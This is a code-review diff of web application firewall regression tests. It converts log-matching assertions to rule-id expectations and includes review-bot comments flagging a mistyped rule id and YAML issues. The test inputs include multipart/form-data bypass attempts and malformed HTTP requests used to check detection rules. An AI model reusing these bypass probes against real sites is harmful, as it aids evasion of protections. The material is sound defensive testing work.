@@ -45,29 +43,22 @@ test_overrides: test_ids: [4] reason: "Nginx returns 400 if Host header is missing" output: - log: - expect_ids: [] status: 400 - rule_id: 920430 test_ids: [8] reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code." output: - log: - expect_ids: [] status: 505 - expect_error: false - rule_id: 932200 test_ids: [13] reason: "TODO: the log file contains MATCHED_VAR instead of the macro expansion result" output: - expect_error: true - rule_id: 933110 test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27] reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" output: log: - expect_ids: [] - expect_error: false + no_expect_ids: [9331110] - rule_id: 934131 test_ids: [5] reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" diff --git a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml index e66fd8cc6..371b6ea40 100644 --- a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml +++ b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 911100 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: "id \"911100\"" + log: + no_expect_ids: [911100] - test_id: 2 stages: - input: @@ -31,7 +31,8 @@ tests: uri: "/options" version: "HTTP/1.1" output: - no_log_contains: "id \"911100\"" + log: + no_expect_ids: [911100] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: uri: "/head" version: "HTTP/1.1" output: - no_log_contains: "id \"911100\"" + log: + no_expect_ids: [911100] - test_id: 4 stages: - input: 
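Review bot: The new `no_expect_ids: [9331110]` in the 933110 override carries an extra digit: the entry's own `rule_id` is 933110, so the check looks for an id that can never appear in the log and passes vacuously for all ten listed test ids; it should read `no_expect_ids: [933110]`. Separately, the 932200 test 13 override loses its only `expect_error: true` line and is left with a bare `output:`, which a YAML parser reads as null — unless the override loader tolerates that, a concrete `status` or `log` expectation consistent with the TODO reason belongs there. The 920290 entry at the top of the hunk starts outside it.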
@@ -61,7 +63,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"911100\"" + log: + no_expect_ids: [911100] - test_id: 5 stages: - input: @@ -75,7 +78,8 @@ tests: uri: "/test" version: "HTTP/1.1" output: - log_contains: "id \"911100\"" + log: + expect_ids: [911100] - test_id: 6 desc: Method is not allowed by policy (911100) from old modsec regressions stages: @@ -94,7 +98,8 @@ tests: uri: "/delete" version: HTTP/1.0 output: - log_contains: id "911100" + log: + expect_ids: [911100] - test_id: 7 desc: Method is not allowed by policy (911100) from old modsec regressions stages: @@ -113,7 +118,8 @@ tests: uri: "/foo" version: HTTP/1.0 output: - log_contains: id "911100" + log: + expect_ids: [911100] - test_id: 8 desc: Method is not allowed by policy (911100) from old modsec regressions stages: @@ -132,4 +138,5 @@ tests: uri: "/subscribe" version: HTTP/1.0 output: - log_contains: id "911100" + log: + expect_ids: [911100] diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index eec82c958..573fce3c6 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml @@ -21,7 +21,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 2 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: @@ -40,7 +41,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 3 desc: Request Indicates a Security Scanner Scanned the Site (913100) stages: @@ -59,7 +61,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 4 desc: "Scanner identification based on User-agent field" stages: 
@@ -74,7 +77,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 5 desc: "YUM package manager allow list" stages: @@ -89,7 +93,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "913100" + log: + no_expect_ids: [913100] - test_id: 6 desc: "ZGrab" stages: @@ -104,7 +109,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 7 desc: "eCairn allow list" stages: @@ -119,4 +125,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "913100" + log: + no_expect_ids: [913100] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 01a8b318e..3dc6d556b 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -18,7 +18,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 2 desc: | Request has tab (\t) before request method - Apache complains @@ -50,7 +51,8 @@ tests: uri: "*" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 4 desc: Valid CONNECT stages: @@ -66,7 +68,8 @@ tests: version: "HTTP/1.1" output: status: 200 - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 5 desc: invalid Connect request, domains require ports stages: @@ -96,7 +99,8 @@ tests: uri: "www.coreruleset.org:80" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 7 desc: Valid request with query and anchor components stages: 
@@ -111,10 +115,11 @@ tests: uri: "/get/index.html?I=Like&Apples=Today#tag" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 8 desc: | - The colon in the path is not allowed. Apache will block by default + The colon in the path is not allowed. Apache will block by default: (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file stages: - input: @@ -143,7 +148,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 10 desc: An invalid method with a long name stages: @@ -158,12 +164,13 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920100\"" + log: + expect_ids: [920100] - test_id: 11 desc: | - An invalid request because a backslash is used in uri + An invalid request because a backslash is used in URI. Apache will end up blocking this before it gets to CRS. - We will need to support OR output tests to fix this + We will need to support OR output tests to fix this. stages: - input: dest_addr: "127.0.0.1" @@ -226,7 +233,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "920100" + log: + expect_ids: [920100] - test_id: 15 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: @@ -256,4 +264,5 @@ tests: uri: "http://localhost" version: "HTTP/1.1" output: - log_contains: "id \"920100\"" + log: + expect_ids: [920100] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml index 63709a82c..69d2d96be 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml 
@@ -28,7 +28,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: id "920120" + log: + expect_ids: [920120] - test_id: 2 desc: Attempted multipart/form-data bypass (920120) from old modsec regressions stages: @@ -62,7 +63,8 @@ tests: Contact info. -----------------------------627652292512397580456702590-- output: - log_contains: id "920120" + log: + expect_ids: [920120] - test_id: 3 desc: Invalid Request Body (920120) from old modsec regressions stages: @@ -98,7 +100,8 @@ tests: Submit -----------------------------265001916915724-- output: - log_contains: id "920120" + log: + expect_ids: [920120] - test_id: 4 desc: Attempted multipart/form-data bypass (920120). Negative test. stages: @@ -117,11 +120,12 @@ tests: Content-Disposition: form-data; name="file"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 5 desc: Attempted multipart/form-data bypass (920120). stages: @@ -140,11 +144,12 @@ tests: Content-Disposition: form-data; name=";zzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 6 desc: Attempted multipart/form-data bypass (920120). stages: 
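Review bot: For tests 4 onward in this file the trailing body lines (`helloworld`, the closing `-----------------------------265001916915724--` boundary, `version:` and `output:`) are rewritten rather than only having their assertion replaced, which suggests an indentation change, but the collapsed view does not show the old columns. If those lines previously sat outside the `data:` block scalar, the old tests were sending a multipart body without its closing boundary, so the negative expectations (`no_expect_ids: [920120]` in tests 4, 18 through 35, 38 and 39) should be confirmed by a fresh run against the corrected body rather than carried over from the old results. The same pattern repeats in the 920120 hunks on the following lines through test 39.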
@@ -163,11 +168,12 @@ tests: Content-Disposition: form-data; name="amp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 7 desc: Attempted multipart/form-data bypass (920120). stages: @@ -186,11 +192,12 @@ tests: Content-Disposition: form-data; name="mp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 8 desc: Attempted multipart/form-data bypass (920120). stages: @@ -209,11 +216,12 @@ tests: Content-Disposition: form-data; name="p;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 9 desc: Attempted multipart/form-data bypass (920120). stages: @@ -232,11 +240,12 @@ tests: Content-Disposition: form-data; name="Zamp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 10 desc: Attempted multipart/form-data bypass (920120). stages: 
@@ -255,11 +264,12 @@ tests: Content-Disposition: form-data; name="Zmp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 11 desc: Attempted multipart/form-data bypass (920120). stages: @@ -278,11 +288,12 @@ tests: Content-Disposition: form-data; name="Zp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 12 desc: Attempted multipart/form-data bypass (920120). stages: @@ -301,11 +312,12 @@ tests: Content-Disposition: form-data; name="Z;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 13 desc: Attempted multipart/form-data bypass (920120). stages: @@ -324,11 +336,12 @@ tests: Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 14 desc: Attempted multipart/form-data bypass (920120). stages: 
@@ -347,11 +360,12 @@ tests: Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 15 desc: Attempted multipart/form-data bypass (920120). stages: @@ -370,11 +384,12 @@ tests: Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 16 desc: Attempted multipart/form-data bypass (920120). stages: @@ -393,11 +408,12 @@ tests: Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 17 desc: Attempted multipart/form-data bypass (920120). stages: @@ -416,11 +432,12 @@ tests: Content-Disposition: form-data; name="mZ;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 18 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouy]uml;.' stages: 
@@ -439,11 +456,12 @@ tests: Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 19 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouy]uml;' stages: @@ -462,11 +480,12 @@ tests: Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 20 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeioucghjswy]circ;.' stages: @@ -485,11 +504,12 @@ tests: Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 21 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeioucghjswy]circ;' stages: 
@@ -508,11 +528,12 @@ tests: Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 22 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouclnrszg]acute;.' stages: @@ -531,11 +552,12 @@ tests: Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 23 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouclnrszg]acute;' stages: @@ -554,11 +576,12 @@ tests: Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 24 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiou]grave;.' stages: 
@@ -577,11 +600,12 @@ tests: Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 25 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiou]grave;' stages: @@ -600,11 +624,12 @@ tests: Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 26 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cgklnrst]cedil;.' stages: @@ -623,11 +648,12 @@ tests: Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 27 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cgklnrst]cedil;' stages: 
@@ -646,11 +672,12 @@ tests: Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 28 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[anoi]tilde;.' stages: @@ -669,11 +696,12 @@ tests: Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 29 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[anoi]tilde;' stages: @@ -692,11 +720,12 @@ tests: Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 30 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cdelnrstz]caron;.' stages: 
@@ -715,11 +744,12 @@ tests: Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 31 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cdelnrstz]caron;' stages: @@ -738,11 +768,12 @@ tests: Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 32 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[au]ring;.' stages: @@ -761,11 +792,12 @@ tests: Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 33 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;' stages: 
@@ -784,11 +816,12 @@ tests: Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 34 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: ø,&, ,'.' stages: @@ -807,11 +840,12 @@ tests: Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 35 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;' stages: @@ -830,11 +864,12 @@ tests: Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 36 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES." stages: 
@@ -853,11 +888,12 @@ tests: Content-Disposition: form-data; name="&fi;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 37 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES_NAMES." stages: @@ -876,11 +912,12 @@ tests: Content-Disposition: form-data; name="test"; filename="&fi;zzz" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 38 desc: "Attempted multipart/form-data bypass (920120). Don't match ; that are part of HTML entities in both FILES and FILES_NAMES." stages: @@ -899,11 +936,12 @@ tests: Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 39 desc: "Attempted multipart/form-data bypass (920120). Allow empty fields." stages: @@ -922,8 +960,9 @@ tests: Content-Disposition: form-data; name=""; filename="" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml index 8deb3dc62..7b8191f98 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml @@ -25,7 +25,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: "id \"920121\"" + log: + expect_ids: [920121] - test_id: 2 stages: - input: @@ -47,7 +48,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: "id \"920121\"" + log: + expect_ids: [920121] - test_id: 3 stages: - input: @@ -69,7 +71,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: "id \"920121\"" + log: + expect_ids: [920121] - test_id: 4 stages: - input: @@ -91,7 +94,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: "id \"920121\"" + log: + expect_ids: [920121] - test_id: 5 stages: - input: @@ -113,4 +117,5 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - no_log_contains: "id \"920121\"" + log: + no_expect_ids: [920121] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index ac93c5db0..aa61ceb50 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml @@ -4,8 +4,8 @@ meta: description: "Tests to trigger rule 920160" rule_id: 920160 tests: - - # Non digit Content-Length without content-type - test_id: 1 + - test_id: 1 + desc: Non digit Content-Length without content-type stages: - input: dest_addr: "127.0.0.1" @@ -20,8 +20,8 @@ tests: version: "HTTP/1.1" output: status: 400 - - # Non digit content-length with content-type - test_id: 2 + - test_id: 2 + desc: Non digit content-length with content-type stages: - input: dest_addr: "127.0.0.1" 
@@ -37,8 +37,8 @@ tests: version: "HTTP/1.1" output: status: 400 - - # Mixed digit and non digit content length - test_id: 3 + - test_id: 3 + desc: Mixed digit and non digit content length stages: - input: dest_addr: "127.0.0.1" @@ -54,10 +54,11 @@ tests: version: "HTTP/1.1" output: status: 400 - - # Test is based in httpbin.org, so backend returns 405 if you are not posting to /post - # Apache auto corrects for this error now so the log should not contain anything - test_id: 4 - desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions + - test_id: 4 + desc: | + Content-Length HTTP header is not numeric (920160) from old modsec regressions + Test is based in httpbin.org, so backend returns 405 if you are not posting to /post + Apache auto corrects for this error now so the log should not contain anything stages: - input: dest_addr: 127.0.0.1 @@ -77,7 +78,8 @@ tests: data: abc output: status: 200 - no_log_contains: id "920160" + log: + no_expect_ids: [920160] - test_id: 5 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions stages: @@ -99,4 +101,3 @@ tests: data: abc output: status: 400 - # log_contains: id "920160" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml index a8b9a1090..a8f4b8942 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml @@ -4,8 +4,8 @@ meta: description: "A Selection of tests to trigger rule 920170" rule_id: 920170 tests: - - # POST Request with data (valid) - test_id: 1 + - test_id: 1 + desc: POST Request with data (valid) stages: - input: dest_addr: "127.0.0.1" 
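Review bot: `desc: |` in the new test 4 entry keeps the block scalar's trailing newline, so this description ends in `\n` unlike the single-line `desc:` values introduced for tests 1 to 3 in the same file; `desc: |-` gives the same text without the trailing newline (or `>-` if one folded line is intended). The 920170 test 4 hunk on the next line uses the same `|` form and would benefit from the same change.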
@@ -20,9 +20,10 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920170\"" - - # GET request with data - test_id: 2 + log: + no_expect_ids: [920170] + - test_id: 2 + desc: GET request with data stages: - input: dest_addr: "127.0.0.1" @@ -37,9 +38,10 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920170\"" - - # Head Request with data - test_id: 3 + log: + expect_ids: [920170] + - test_id: 3 + desc: Head Request with data stages: - input: dest_addr: "127.0.0.1" @@ -54,10 +56,12 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920170\"" - - # GET Request but content length is 0 and data is provided - # Weird HTTP 1.0 support bug in Apache, without newline causes 408 - test_id: 4 + log: + expect_ids: [920170] + - test_id: 4 + desc: | + GET Request but content length is 0 and data is provided. + Weird HTTP 1.0 support bug in Apache, without newline causes 408 stages: - input: dest_addr: "127.0.0.1" @@ -70,13 +74,14 @@ tests: Content-Length: "0" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "hi=test\r\n" - stop_magic: true uri: "/" version: "HTTP/1.1" + autocomplete_headers: false output: - no_log_contains: "id \"920170\"" - - # GET request with content length 0 and no data. - test_id: 5 + log: + no_expect_ids: [920170] + - test_id: 5 + desc: GET request with content length 0 and no data. stages: - input: dest_addr: "127.0.0.1" @@ -92,7 +97,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id 